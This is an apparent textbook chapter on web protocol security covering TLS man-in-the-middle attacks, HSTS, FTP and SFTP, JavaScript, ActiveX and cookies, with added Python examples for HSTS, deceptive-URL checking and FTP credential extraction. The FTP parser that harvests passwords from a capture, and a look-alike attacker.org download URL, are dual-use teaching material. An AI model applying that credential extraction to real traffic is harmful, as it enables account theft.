SSL/TLS-based security is not foolproof. It can be defeated, as in the case of a proxy-based attack. Examining the handshake, the following steps could occur, as shown in this illustration:
• SSL/TLS man-in-the-middle attack
1. The client (C) initiates a TLS session with their bank server (S) through a proxy (P).
2. P acts by echoing the information sent to it by C (step 1a) to S (step 1b), imitating C to S, and establishing a secure channel between P and S (TLS #1).
3. P creates a second secure channel to C (TLS #2), using information received from S, pretending to be S.
4. The user assumes that the dotted lines occur—a secure channel to the bank directly—when the client actually has only a secure channel to the proxy. In fact, the proxy has the secure channel to the bank, and as far as the bank is concerned, the proxy is the client and using the client’s credentials. For a proxy that is not completely trusted, this could be a nightmare for the client.
The advent of high-assurance certificates prevents the proxy from imitating the bank, as it cannot give the correct set of credentials back to the client to complete the high-assurance handshake. Mutual authentication is also designed to prevent this, as the proxy cannot simultaneously imitate both sides of the handshake. Mutual authentication is rarely used, as there is the issue of maintaining client certificates that are trusted to a server—a challenge for broad-reach sites like financial institutions and e-commerce sites.
The Web (HTTP and HTTPS)
HTTP is used for the transfer of hyperlinked data over the Internet, from web servers to browsers. When a user types a URL such as http://www.example.com into a browser, the http:// portion indicates that the desired method of data transfer is HTTP. Although it was initially created just for HTML pages, today many protocols deliver content over this connection protocol. HTTP traffic takes place over TCP port 80 by default, and this port is typically left open on firewalls because of the extensive use of HTTP.
One of the primary drivers behind the development of SSL/TLS was the desire to hide the complexities of cryptography from end users. When using an SSL/TLS-enabled browser, this can be done simply by requesting a secure connection from a web server instead of a nonsecure connection. With respect to HTTP connections, this is as simple as using https:// in place of http://. The entry of an SSL/TLS-based protocol will cause a browser to perform the necessary negotiations with the web server to establish the required level of security. Once these negotiations have been completed and the session is secured by a session key, a closed padlock icon is displayed in the lower right of the screen to indicate that the session is secure. If the protocol is https:, your connection is secure; if it is http:, then the connection is carried by plaintext for anyone to see. Figure 17.6 shows a secure connection in Internet Explorer, and Figure 17.7 shows the equivalent in Firefox. As of Internet Explorer 7, Microsoft places the padlock icon in an obvious position, next to the URL, instead of in the lower-right corner of the screen, where users could more easily miss it. To combat a variety of attacks, in 2006 the SSL/TLS landscape changed with the advent of extended validation certificates and high security browsers. These changes provide visual cues to the user when high assurance certificates are being used as part of a secure SSL/TLS connection. These improvements were in response to phishing sites and online fraud, and although they require additional costs and registration on the part of the vendors, this is a modest up-front cost to help reduce fraud and provide confidence to customers.
• Figure 17.6 High-assurance notification in Internet Explorer
• Figure 17.7 High-assurance notification in Firefox
The objective of enabling cryptographic methods in this fashion is to make it easy for end users to use these protocols. SSL/TLS is designed to be protocol agnostic. Although designed to run on top of TCP/IP, it can operate on top of other, lower-level protocols, such as X.25. SSL/TLS requires a reliable lower-level protocol, so it is not designed and cannot properly function on top of a nonreliable protocol such as the User Datagram Protocol (UDP). Even with this limitation, SSL/TLS has been used to secure many common TCP/IP-based services, as shown in Table 17.1.
Table 17.1 SSL/TLS-Protected Services
HTTPS Everywhere
When websites were first deployed, providing HTTPS was a resource cost issue, because it took processor cycles to encrypt all the connections. Today, with a variety of encryption technologies available, managing the resources for HTTPS connections is much easier, and a case has been made by many in security that all web connections should be HTTPS. This has resulted in the HTTPS Everywhere movement (https://www.eff.org/https-everywhere/), spearheaded by the Electronic Frontier Foundation (EFF).
If websites everywhere would turn off HTTP in favor of using only HTTPS (with TLS in light of SSL vulnerabilities), this would not solve all the security problems, but it would raise the bar substantially for many attacks. HTTPS Everywhere would go a long way for privacy, because it would prevent data snooping. It would also prevent many man-in-the-middle attacks, such as SSL stripping.
Because not all sites are HTTPS yet, the EFF has developed a plug-in for browsers called HTTPS Everywhere. This plug-in helps the browser maintain an HTTPS connection and warns when it is not present.
HTTP Strict Transport Security
HTTP Strict Transport Security (HSTS) is an IETF standard and a mechanism to enforce rules to prevent browsers from downgrading security when accessing a site. The policy states that when a web server provides an HTTP response header field named “Strict-Transport-Security,” then the user agent shall comply by not issuing insecure requests. The header field has a time period associated with it, set in the header, during which the policy is in effect.
HSTS was created in response to a series of attack profiles, the most critical being the SSL stripping man-in-the-middle attacks, first publicly introduced by Moxie Marlinspike. The SSL stripping attack works on both SSL and TLS by transparently converting the secure HTTPS connection into a plain HTTP connection, removing the transport layer encryption protections. Although an observant user might notice the drop in security, by then the damage may have been done, and this relies upon users knowing whether a page should be secure or not. No warnings are presented to the user during the downgrade process, which makes the attack fairly subtle to all but the most vigilant. Marlinspike’s sslstrip tool fully automates the attack and is available on the Web.
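The HSTS policy and the downgrade it prevents, as an added example (not the book’s code and not the EFF’s): a minimal user-agent-side HSTS cache in Python that parses the Strict-Transport-Security header, remembers the host for max-age seconds, and rewrites later http:// URLs to https:// before any request leaves the machine. This is what leaves an SSL-stripping proxy nothing to strip, and it is also, in code, what the HTTPS Everywhere plug-in described above does for sites that never sent the header. The class and function names, the injected clock and the sample header value are my constructions.

```python
"""User-agent side of HSTS (RFC 6797): parse the header, remember the host,
upgrade later plain-HTTP requests.  Added example, not the book's code."""
import time
from urllib.parse import urlsplit, urlunsplit

# Constructed sample header value, as a site would send it over HTTPS.
SAMPLE_HEADER = "max-age=31536000; includeSubDomains; preload"


def parse_hsts(header_value):
    """Parse the directives (RFC 6797 section 6.1). Returns None when the
    header is unusable, i.e. carries no numeric max-age."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name == "max-age" and value.isdigit():
            policy["max_age"] = int(value)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy if policy["max_age"] is not None else None


class HstsCache:
    """The browser's memory of hosts that asserted HSTS (host -> expiry, subdomains)."""

    def __init__(self, now=time.time):
        self.now = now          # injectable clock so expiry can be exercised
        self.hosts = {}

    def record(self, host, header_value, secure_transport=True):
        """Section 8.1: only a header received over an error-free TLS connection
        may set policy; over plain HTTP it is ignored, otherwise an on-path
        attacker could plant or clear policies.  max-age=0 removes the host."""
        if not secure_transport:
            return False
        policy = parse_hsts(header_value)
        if policy is None:
            return False
        host = host.lower()
        if policy["max_age"] == 0:
            self.hosts.pop(host, None)
        else:
            self.hosts[host] = (self.now() + policy["max_age"], policy["include_subdomains"])
        return True

    def is_known(self, host):
        host, now = host.lower(), self.now()
        for known, (expires, subdomains) in self.hosts.items():
            if expires <= now:
                continue
            if host == known or (subdomains and host.endswith("." + known)):
                return True
        return False

    def rewrite(self, url):
        """Return the URL that should actually be requested: http:// to a known
        HSTS host becomes https:// before any bytes leave (section 8.3)."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not self.is_known(parts.hostname or ""):
            return url
        netloc = parts.hostname
        if parts.port and parts.port != 80:          # port 80 maps to 443 implicitly
            netloc += ":%d" % parts.port
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


def demo():
    """Scenario with a controllable clock: policy learned over HTTPS, a later
    plain-HTTP link is upgraded, and the policy lapses after max-age."""
    clock = {"t": 1_000_000.0}
    cache = HstsCache(now=lambda: clock["t"])
    out = {"ignored_over_http": not cache.record("example.com", SAMPLE_HEADER, secure_transport=False)}
    out["before"] = cache.rewrite("http://example.com/login")
    cache.record("Example.com", SAMPLE_HEADER)
    out["after"] = cache.rewrite("http://example.com/login?next=%2F")
    out["subdomain"] = cache.rewrite("http://www.example.com/")
    out["other_host"] = cache.rewrite("http://other.example/")
    clock["t"] += 31536000 + 1
    out["expired"] = cache.rewrite("http://example.com/login")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The first visit is the remaining gap: before the policy has ever been seen over HTTPS, the cache has nothing to upgrade, which is why the preload directive and the browser-shipped preload lists exist.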
Try This!
Sniff Your Own Connections!
Determining what level of protection you have when surfing the Web is easy. Use a packet-sniffing tool like Wireshark to record your own communications. Because HTTPS ends at your browser, the packet capture mechanism should reflect the same experience an outsider will see if sniffing your traffic. By examining the packets, you can see if traffic is encrypted, which traffic is encrypted, and what is visible to outsiders.
Directory Services (DAP and LDAP)
A directory is a data storage mechanism similar to a database, but it has several distinct differences designed to provide efficient data retrieval services compared to standard database mechanisms. A directory is designed and optimized for reading data, offering very fast search and retrieval operations. The types of information stored in a directory tend to be descriptive attribute data. A directory offers a static view of data that can be changed without a complex update transaction. The data is hierarchically described in a treelike structure, and a network interface for reading is typical.
As directories are optimized for read operations, they are frequently employed where data retrieval is desired. Common uses of directories include e-mail address lists, domain server data, and resource maps of network resources.
LDAP over TCP is a plaintext protocol, meaning data is passed in the clear and is susceptible to eavesdropping. Encryption can be used to remedy this problem, and the application of SSL/TLS-based services will protect directory queries and replies from eavesdroppers.
To enable interoperability, the X.500 standard was created as a standard for directory services. The primary method for accessing an X.500 directory is through the Directory Access Protocol (DAP), a heavyweight protocol that is difficult to implement completely, especially on PCs and more constrained platforms. This led to the Lightweight Directory Access Protocol (LDAP), which contains the most commonly used functionality. LDAP can interface with X.500 services, and, most importantly, LDAP can be used over TCP with significantly less computing resources than a full X.500 implementation. LDAP offers all of the functionality most directories need and is easier and more economical to implement; hence LDAP has become the Internet standard for directory services.
SSL/TLS LDAP
SSL/TLS provides several important functions to LDAP services. It can establish the identity of a data source through the use of certificates, and it can also provide for the integrity and confidentiality of the data being presented from an LDAP source. As LDAP and SSL/TLS are two separate independent protocols, interoperability is more a function of correct setup than anything else. To achieve LDAP over SSL/TLS, the typical setup is to establish an SSL/TLS connection and then open an LDAP connection over the protected channel. To do this requires that both the client and the server be enabled for SSL/TLS. In the case of the client, most browsers are already enabled. In the case of an LDAP server, this specific function must be enabled by a system administrator. As this setup initially is complicated, it’s definitely a task for a competent system administrator.
Once an LDAP server is set up to function over an SSL/TLS connection, it operates as it always has. The LDAP server responds to specific queries with the data returned from a node in the search. The SSL/TLS functionality is transparent to the data flow from the user’s perspective. From the outside, SSL/TLS prevents observation of the data request and response, ensuring confidentiality.
File Transfer (FTP and SFTP)
One of the original intended uses of the Internet was to transfer files from one machine to another in a simple and reliable fashion, which was needed by scientific researchers. Today, file transfers represent downloads of music content, reports, and other data sets from other computer systems to a PC-based client. Until 1995, the majority of Internet traffic was file transfers. With all of this need, a protocol was necessary so that two computers could agree on how to send and receive data. As such, FTP is one of the older protocols.
FTP
File Transfer Protocol (FTP) is an application-level protocol that runs over TCP. It uses two connections: a control channel (port 21 by convention) on which commands and replies are exchanged, and a separate data connection, opened per transfer, over which file contents and directory listings flow. FTP is embedded in most operating systems and provides a method of transferring files from a sender to a receiver. Most FTP implementations are designed to operate both ways, sending and receiving, and can enable remote file operations over a TCP/IP connection. FTP clients are used to initiate transactions, and FTP servers are used to respond to transaction requests. The actual request can be either to upload (send data from client to server) or to download (send data from server to client).
Tech Tip
FTP Is Not Secure
FTP is a plaintext protocol. User credentials used for logins are sent in plaintext across the network. File transfers via FTP can be in either binary or text mode, but in either case, they are in plaintext across the network. If confidentiality of a transfer is desired, then a secure channel should be used for the transfer, either FTP wrapped in TLS (FTPS) or SFTP over SSH. If integrity is a concern, a more complex method of transfer will be required, to support digital hashes and signatures.
Clients for FTP on a PC can range from an application program, to the command-line FTP program in Windows/DOS, to web browsers. Historically you could open an FTP data store in a browser by entering ftp://url in the browser's address field to indicate that you wanted to see the data associated with the URL via an FTP session, and the browser handled the details; the major browsers have since removed built-in FTP support, so a dedicated client is now the usual route.
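The Tech Tip above says FTP credentials cross the network in the clear. The following is an added example, not code from the textbook, that shows what that means in practice: given a reassembled FTP control-channel stream, it pulls out every login attempt, its password, whether it succeeded, the files moved, and the passive-mode data endpoint announced by the server. The capture is constructed by hand (the host names, addresses and credentials are invented), but it has the same shape a sniffer would reassemble from port 21 traffic.

```python
"""Pull FTP logins out of a captured control channel (added example)."""
import re

# Constructed sample capture: (direction, line) pairs as a sniffer would
# reassemble them from the TCP stream. "C" is client -> server, "S" the reply.
CAPTURE = [
    ("S", "220 files.example.test FTP server ready"),
    ("C", "USER alice"),
    ("S", "331 Password required for alice"),
    ("C", "PASS hunter2"),
    ("S", "230 User alice logged in"),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (203,0,113,10,195,80)"),
    ("C", "RETR quarterly-report.xlsx"),
    ("S", "150 Opening BINARY mode data connection"),
    ("S", "226 Transfer complete"),
    ("C", "USER anonymous"),
    ("C", "PASS guest@"),
    ("S", "530 Login incorrect"),
]

# Only the commands this analysis cares about; everything else is skipped.
CMD_RE = re.compile(r"^(USER|PASS|RETR|STOR)\s*(.*)$", re.I)


def parse_pasv(reply):
    """Decode a 227 reply: (h1,h2,h3,h4,p1,p2) -> ("h1.h2.h3.h4", p1*256+p2)."""
    m = re.search(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)", reply)
    if not m:
        return None
    h = list(map(int, m.groups()))
    return ".".join(map(str, h[:4])), h[4] * 256 + h[5]


def extract_sessions(capture):
    """Return one dict per USER attempt: password, outcome, files, data endpoints.

    Everything here is recoverable because FTP never encrypts the control
    channel. FTPS (FTP over TLS) or SFTP is what would hide it.
    """
    sessions, cur = [], None
    for direction, line in capture:
        if direction == "C":
            m = CMD_RE.match(line)
            if not m:
                continue
            cmd, arg = m.group(1).upper(), m.group(2)
            if cmd == "USER":
                cur = {"user": arg, "password": None, "logged_in": False,
                       "files": [], "data_endpoints": []}
                sessions.append(cur)
            elif cur is None:
                continue  # command before any USER: nothing to attribute it to
            elif cmd == "PASS":
                cur["password"] = arg
            else:  # RETR or STOR
                cur["files"].append((cmd, arg))
        elif cur is not None:
            code = line[:3]
            if code == "230":
                cur["logged_in"] = True
            elif code == "227":
                endpoint = parse_pasv(line)
                if endpoint:
                    cur["data_endpoints"].append(endpoint)
    return sessions


if __name__ == "__main__":
    for s in extract_sessions(CAPTURE):
        print(s)
```

The same parser, run over real capture output, is the whole reason the Tech Tip matters: an analyst (or an attacker) on the path needs nothing more than this to harvest accounts. The 227 reply is also worth noticing operationally, since it tells the eavesdropper exactly which address and port the file data will cross next.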
Blind FTP (Anonymous FTP)
To access resources on a computer, an account must be used to allow the operating system-level authorization function to work. In the case of an FTP server, you may not wish to control who gets the information, so a standard account called anonymous exists. This allows unlimited public access to the files and is commonly used when you want to have unlimited distribution. On a server, access permissions can be established to allow only downloading or only uploading or both, depending on the system's function.
As FTP can be used to allow anyone access to upload files to a server, it is considered a security risk and is commonly implemented on specialized servers isolated from other critical functions.
As FTP servers can present a security risk, they are typically not permitted on workstations and are disabled on servers without need for this functionality.
SFTP
FTP operates in a plaintext mode, so an eavesdropper can observe the data being passed. If confidential transfer is required, SFTP (the SSH File Transfer Protocol, often loosely called Secure FTP) accomplishes this task by running file-transfer operations as a subsystem of the Secure Shell (SSH) protocol. Despite the name, SFTP shares nothing with FTP on the wire: it is a separate protocol, carried inside an SSH session, that encrypts both the commands and the data being passed, and it requires SFTP support on both the client and the server. (FTP over TLS, known as FTPS, is a different mechanism that keeps the FTP protocol and wraps it in TLS; the two are not interchangeable.) SFTP is not interoperable with standard FTP, since the encrypted traffic cannot be read by a standard FTP server program. To establish SFTP data transfers, the server must be enabled with the SFTP subsystem, and then clients can access the server, provided they have the correct credentials. One of the first SFTP operations is the same in spirit as that of FTP: an identification function that uses a username and an authentication function that uses a password (or, more commonly and more safely, an SSH key). There is no anonymous SFTP account by definition, so access is established and controlled from the server using standard access control lists (ACLs), IDs, and passwords.
Vulnerabilities
Modern encryption technology can provide significant levels of privacy, up to military-grade secrecy. The use of protocols such as TLS provides a convenient method for end users to use cryptography without having to understand how it works. This can result in complacency, the impression that once TLS is enabled, the user is safe, but this is not necessarily the case. If a Trojan program is recording keystrokes and sending the information to another unauthorized user, for example, TLS cannot prevent the security breach. If the user is connecting to an untrustworthy site, the mere fact that the connection is secure does not prevent the other site from running a scam.
TLS is not a guarantee of security. All TLS can do is secure the transport link between the computer and the server. There are still a number of vulnerabilities that can affect the security of the system. A keylogger on the client can copy the secrets before they go to the TLS-protected link. Malware on either end of the secure communication can copy and/or alter transmissions outside the secure link.
Using TLS and other encryption methods will not guard against your credit card information being "lost" by a company with which you do business, as in the Egghead.com credit card hack of 2000. In December 2000, Egghead.com's credit card database was hacked, and as many as 3.7 million credit card numbers were exposed. This contributed to the eventual collapse of the firm, which filed for bankruptcy the following year. Late 2013 and 2014 were filled with data breaches, losses of customer information (including credit card numbers) from many high-profile merchants such as Target. In these cases, the security failure was internal to the data storage in the company, not during transfer to the firm. So even with secure web controls, data can be lost after being stored in a company database. The key to understanding what is protected and where it is protected is to understand what these protocols can and cannot do. The TLS suite can protect data in transit, but not on either end in storage. It can authenticate users and servers, provided that the certificate mechanisms are established and used by both parties. Properly set up and used, TLS can provide a very secure method of authentication, followed by confidentiality in data transfers and data integrity checking. But again, all of this occurs during transit, and the protection ends once the data is stored.
Code-Based Vulnerabilities
The ability to connect many machines together to transfer data is what makes the Internet so functional for so many users. Browsers enable much of this functionality, and as the types of data have grown on the Internet, browser functionality has grown as well. But not all functions can be anticipated or included in each browser release, so the idea of extending browser functions through plug-ins became a standard. Browsers can perform many types of data transfer, and in some cases, additional helper programs, or plug-ins, can increase functionality for specific types of data transfers. In other cases, separate application programs may be called by a browser to handle the data being transferred. Common examples of these plug-ins and programs include Shockwave and Flash plug-ins, Windows Media Player, and Adobe Acrobat (both plug-in and standalone). The richness that enables the desired functionality of the Internet has also spawned some additional types of interfaces in the form of ActiveX components and Java applets. In essence, all of these are pieces of code that can be written by third parties, distributed via the Internet, and run on your PC. If the code does what the user wants, the user is happy. But the opportunity exists for these applications or plug-ins to include malicious code that performs actions not desired by the end user. Malicious code designed to operate within a web browser environment is a major tool for computer crackers to use to obtain unauthorized access to computer systems. Whether delivered by HTML-based e-mail, by getting a user to visit a web site, or even delivered via an ad server, the result is the same: malware performs malicious tasks in the browser environment.
Buffer Overflows
One of the most common exploits used to hack into software is the buffer overflow. The buffer-overflow vulnerability is a result of poor coding practices on the part of software programmers: when any program reads input into a buffer (an area of memory) and does not validate the input for correct length, the potential for a buffer overflow exists. The vulnerability occurs when an application can accept more input than it has assigned storage space for, and the input data overwrites other program areas. The exploit concept is simple: an attacker develops a fragment of executable code that performs some action on the target machine and appends this code to an otherwise legitimate input to a program on the target machine, padded so that the overflow overwrites a control value such as a saved return address. When the target machine reads the too-long input, the overflow corrupts the original program's state. The malicious code fragment is now in the machine's memory, awaiting execution. If the attacker has constructed it correctly, the program will branch into the attacker's code, running it instead of crashing.
Cross Check
Dangers of Software Vulnerabilities
Errors in software lead to vulnerabilities associated with the code being run. These vulnerabilities are exploited by hackers to perform malicious activity on a machine. These errors are frequently related to web-enabled programs, as the Internet provides a useful conduit for hackers to achieve access to a system. The problem of code vulnerabilities, from buffer overflows, to arithmetic overflows, to cross-site request forgeries, cross-site scripting, and injection attacks, is a serious issue that has many faces. It is noted in this chapter because web components are involved, but full details on the severity of and steps to mitigate this issue are in Chapter 18. The next time you provide input to a web-based application, think of what malicious activity you could perform on the server in question.
Java
Java is a computer language invented by Sun Microsystems as an alternative to Microsoft's development languages. Designed to be platform-independent and syntactically based on C, Java offered a low learning curve and a way of implementing programs across an enterprise, independent of platform. Although platform independence never fully materialized, and the pace of Java language development was slowed by Sun, Java has found itself to be a leader in object-oriented programming languages. Java operates through an interpreter called a Java Virtual Machine (JVM) on each platform that interprets the compiled Java bytecode, and this JVM enables the program's functionality for the specific platform. Java's reliance on an interpretive step led to early performance complaints, and although just-in-time compilation in modern JVMs has narrowed the gap considerably, Java is still perceived as slower than natively compiled languages. Security was one of the touted advantages of Java, but in reality, security is not a built-in function but an afterthought and is implemented independently of the language core. This all being said, properly coded Java can operate at reasonable rates, and when properly designed can act in a secure fashion. These facts have led to the wide dependence on Java for much of the server-side coding for e-commerce and other web-enabled functionality. Servers can add CPUs to address speed concerns, and the low learning curve has proven cost efficient for enterprises.
Java is designed for safety, reducing the opportunity for system crashes. Java can still perform malicious activities, and the fact that many users falsely believe it is safe increases its usefulness to attackers.
Java was initially designed to be used in trusted environments, and when it moved to the Internet for general use, safety became one of its much-hyped benefits. Java has many safety features, such as type checking and garbage collection, that actually improve a program's ability to run safely on a machine and not cause operating system-level failures. This isolates the user from many common forms of operating system faults that can end in the "blue screen of death" in a Windows environment, where the operating system crashes and forces a reboot of the system. Safety is not security, however, and although safe, a malicious Java program can still cause significant damage to a system. The primary mode of a computer program is to interact with the operating system and perform functional tasks for a user, such as getting and displaying data, manipulating data, storing data, and so on. Although these functions can seem benign, when enabled across the Web they can have some unintended consequences. The ability to read data from a hard drive and display it on the screen is essential for many programs, but when the program is downloaded and run from the Internet and the data is, without the knowledge of the user, sent across the Internet to an unauthorized user, this enables a program to spy on a user and steal data. Writing data to the hard drive can also cause deletions if the program doesn't write the data where the user expects. Sun recognized these dangers and envisioned three different security policies for Java that would be implemented via the browser and JVM, providing different levels of security. The first policy is not to run Java programs at all. The second restricts Java program functionality when the program is not run directly from the system's hard drive: programs being directly executed from the Internet have severe restrictions that block disk access and force other security-related functions to be performed. The last policy runs any and all Java programs as presented. Most browsers adopted the second security policy, restricting Java functionality on a client unless the program was loaded directly from the client's hard drive. Although this solved many problems initially, it also severely limited functionality. Today, browsers allow much more specific granularity on security for Java, based on security zones and user settings.
Java and JavaScript are completely separate entities. JavaScript does not create applets or stand-alone applications. JavaScript resides inside HTML documents, and can provide levels of interactivity to web pages that are not achievable with simple HTML. Java is used to create applications that run in a virtual machine or browser. JavaScript code is run in a browser only. JavaScript is not part of the Java environment.
JavaScript
JavaScript is a scripting language developed by Netscape and designed to be operated within a browser instance. JavaScript works through the browser environment. The primary purpose of JavaScript was to enable features such as validation of forms before they are submitted to the server (a convenience, not a control: a user can bypass the script entirely, so the server must validate the same input again). Enterprising programmers found many other uses for JavaScript, such as manipulating the browser history files, now prohibited by design. JavaScript actually runs within the browser, and the code is executed by the browser itself. This has led to compatibility problems, and not just between vendors, such as Microsoft and Mozilla, but between browser versions. Security settings in Internet Explorer are done by a series of zones, allowing differing levels of control over .NET functionality, ActiveX functionality, and Java functionality (see Figure 17.8). Unfortunately, these settings can be changed by a Trojan program, altering the browser (without alerting the user) and lowering the security settings. In Firefox, using the NoScript plug-in is a solution to this, but the reduced functionality leads to other issues, as shown in Figure 17.9, and requires more diligent user intervention.
• Figure 17.8 Java configuration settings in Internet Explorer
• Figure 17.9 Security setting functionality issues
Although JavaScript was designed not to be able to access files or network resources directly, except through the browser functions, it has not proven to be as secure as desired. This fault traces back to a similar fault in the Java language, where security was added on, without the benefit of a comprehensive security model. So, although designers put thought and common sense into the design of JavaScript, the lack of a comprehensive security model left some security holes. For instance, a form could submit itself via e-mail to an undisclosed recipient, either eavesdropping, spamming, or causing other problems; imagine your machine sending death-threat e-mails to high-level government officials from a rogue JavaScript implementation. Further, browsers historically had no mechanism to halt a running script, short of aborting the browser instance, and even this may not be possible if the browser has stopped responding to commands. Current browsers isolate tabs and offer to stop an unresponsive script, but a script can still render a page unusable. Malicious JavaScripts can do many things, including opening two new windows every time you close one, each with the code to open two more. There is no way out of this one, short of killing the browser process from the operating system.
Many web sites may have behaviors that users deem less than desirable, such as popping open additional windows, either on top (pop-up) or underneath (pop-under). To prevent these behaviors, a browser feature or extension referred to as a pop-up blocker may be employed. Although they may block some desired pop-ups, most pop-up blockers have settings to allow pop-ups on selected sites. The use of a pop-up blocker assists in retaining strict control over browser behavior and enhances security for the user.
JavaScripts can also trick users into thinking they are communicating with one entity when in fact they are communicating with another. For example, a window may open asking whether you want to download and execute the new update from "http://www.microsoft.com..../update.exe," and what is covered by the ellipsis (...) is actually "www.microsoft.com.attacker.org/"; the user assumes this is a Microsoft address that is cut short by space restrictions on the display. The part of a host name that decides ownership is its end, not its beginning: www.microsoft.com.attacker.org is a host under attacker.org, whatever its first labels say. As a browser scripting language, JavaScript is here to stay. Its widespread popularity for developing applets such as animated clocks, mortgage calculators, and simple games will overcome its buggy nature and poor level of security.
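The display trick above works because people read a host name from the left. The following is an added example, not code from the textbook, that shows how to decide the question the way a browser does: parse the URL, take the host the connection will actually go to, and compare it against the trusted domain from the right-hand end. It uses the text's own attacker.org placeholder and also covers the related userinfo trick (`www.microsoft.com@attacker.org`), which the text does not mention; the function names are my own.

```python
"""Does a URL really belong to the domain its beginning suggests? (added example)"""
from urllib.parse import urlsplit


def real_host(url):
    """Return the host the browser will actually connect to, lowercased.

    urlsplit() does the hard work: any user:pass@ prefix and any :port are
    stripped, so 'https://www.microsoft.com@attacker.org/' yields 'attacker.org'.
    Relative or host-less URLs yield None.
    """
    host = urlsplit(url).hostname
    return host.lower().rstrip(".") if host else None


def belongs_to(url, trusted_domain):
    """True only if the connection host is trusted_domain or a subdomain of it.

    The comparison is anchored at the right-hand end with a leading dot; a bare
    endswith(trusted_domain) would accept 'notmicrosoft.com'.
    """
    host = real_host(url)
    if host is None:
        return False
    trusted_domain = trusted_domain.lower()
    return host == trusted_domain or host.endswith("." + trusted_domain)


def classify(url, trusted_domain):
    """Label a download prompt the way a user would want the browser to."""
    if belongs_to(url, trusted_domain):
        return "trusted"
    return "UNTRUSTED host: %s" % real_host(url)


if __name__ == "__main__":
    for u in ("https://www.microsoft.com/update.exe",
              "http://www.microsoft.com.attacker.org/update.exe",
              "https://www.microsoft.com@attacker.org/update.exe"):
        print(u, "->", classify(u, "microsoft.com"))
```

The check is deliberately conservative: it refuses anything it cannot parse into a host, and it treats a look-alike registrable domain (notmicrosoft.com) as foreign even though it shares a suffix string.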
ActiveX
ActiveX is the name given to a broad collection of application programming interfaces (APIs), protocols, and programs developed by Microsoft to download and execute code automatically over an Internet-based channel. The code is bundled together into an ActiveX control with an .ocx extension. These controls are referenced in HTML using the <object> tag. ActiveX is a tool for the Windows environment and can be extremely powerful. It can do simple things, such as enable a browser to display a custom type of information in a particular way, and it can also perform complex tasks, such as update the operating system and application programs. This range of abilities gives ActiveX a lot of power, but this power can be abused as well as used for good purposes. Internet Explorer has several options to control the execution of ActiveX controls, as illustrated in Figure 17.10.
• Figure 17.10 ActiveX security settings in Internet Explorer
To enable security and consumer confidence in downloaded programs such as ActiveX controls, Microsoft developed Authenticode, a system that uses digital signatures and allows Windows users to determine who produced a specific piece of code and whether or not the code has been altered. As in the case of Java, safety and security are different things, and Authenticode promotes neither in reality. Authenticode provides limited accountability at the time of download and provides reasonable assurance that the code has not been changed since the time of signing. Authenticode does not identify whether a piece of code will cause damage to a system, nor does it regulate how code is used, so a perfectly safe ActiveX control under one set of circumstances may be malicious if used improperly. As with a notary's signature, recourse is very limited: if code is signed by a terrorist organization and the code ruins your machine, all Authenticode did was make it seem legitimate. It is still incumbent upon the users to know from whom they are getting code and to determine whether or not they trust that organization.
Exam Tip: ActiveX technology can be used to create complex application logic that is then embedded into other container objects such as a web browser. ActiveX components have very significant capabilities and thus malicious ActiveX objects can be very dangerous. Authenticode is a means of signing an ActiveX control so that a user can judge trust based on the control's creator.
Critics of Authenticode and other code-signing techniques are not against code signing, for this is a universally recognized good thing. What the critics argue is that code signing is not a panacea for security issues and that marketing it as doing more than it really does is irresponsible. Understanding the nuances of security is important in today's highly technical world, and leaving the explanations to marketing departments is not the ideal solution.
Securing the Browser
A great deal of debate concerns the relative security issue of browser extensions versus the rich user interaction that they provide. There is no doubt that the richness of the environment offered by ActiveX adds to the user experience. But as is the case in most coding situations, added features means weaker security, all other things being constant. If nothing else, a development team must spend some portion of its time on secure development practices, time that some developers and marketers would prefer to spend on new features. Although no browser is 100 percent safe, the use of Firefox coupled with the NoScript plug-in comes the closest to fitting the bill. Firefox will not execute ActiveX, so that threat vector is removed. The NoScript plug-in allows the user to determine from which domains to trust scripts. The use of NoScript puts the onus back on the user as to which domain scripts they choose to trust, and although it's not perfect from a security perspective, this at least allows a measure of control over what code you want to run on your machine.
CGI
The Common Gateway Interface (CGI) was the original method for having a web server execute a program outside the web server process, yet on the same server. CGI offered many advantages to web-based programs. The programs can be written in a number of languages, although Perl is a favorite. These scripted programs embrace the full functionality of a server, allowing access to databases, UNIX commands, other programs, and so on. This provides a wide range of functionality to the web environment. With this unrestrained capability, however, come security issues. Poorly written scripts can cause unintended consequences at run time. The problem with poorly written scripts is that their defects are not always obvious. Sometimes scripts appear to be fine, but unexpected user inputs can have unintended consequences. CGI is an outdated, and for the most part retired, technology. It has been replaced by newer scripting methods.
Server-Side Scripts
CGI has been replaced in many web sites through newer server-side scripting technologies such as Java, Active Server Pages (ASP), ASP.NET, and PHP. All these technologies serve the same purpose as CGI: they let the web server hand a request to application code, run it (in a separate process or inside the server's own), and return the result to the web server to be served to end users via a web page.
The term server-side script is actually a misnomer, as these are actually executable programs that are either interpreted or run in virtual machines. Each of these newer technologies has advantages and disadvantages, but all of them have stronger security models than CGI. With these security models come reduced functionality and, as each is based on a different language, a steeper learning curve. Still, the need for adherence to programming fundamentals exists in these technologies: code must be well designed and well written to avoid the same vulnerabilities that exist in all forms of code. Buffer overflows are still an issue. Changing languages or technologies does not eliminate the basic security problems associated with incorporating open-ended user input into code. Understanding and qualifying user responses before blindly using them programmatically is essential to the security of a system.
Cookies
Cookies are small chunks of ASCII text passed within an HTTP stream to store data temporarily in a web browser instance. Invented by Netscape, cookies pass back and forth between web server and browser and act as a mechanism to maintain state in a stateless world. State is a term that describes the dependence on previous actions. By definition, HTTP traffic served by a web server is stateless: each request is completely independent of all previous requests, and the server has no memory of previous requests. This dramatically simplifies the function of a web server, but it also significantly complicates the task of providing anything but the most basic functionality in a site. Cookies were developed to bridge this gap. A server hands a cookie to the browser in a Set-Cookie header of an HTTP response; the browser returns it on later requests in a Cookie header.
Cookies come in two types, session and persistent. Session cookies last only during a web browsing session with a web site. Persistent cookies are stored on the user's hard drive and last until an expiration date.
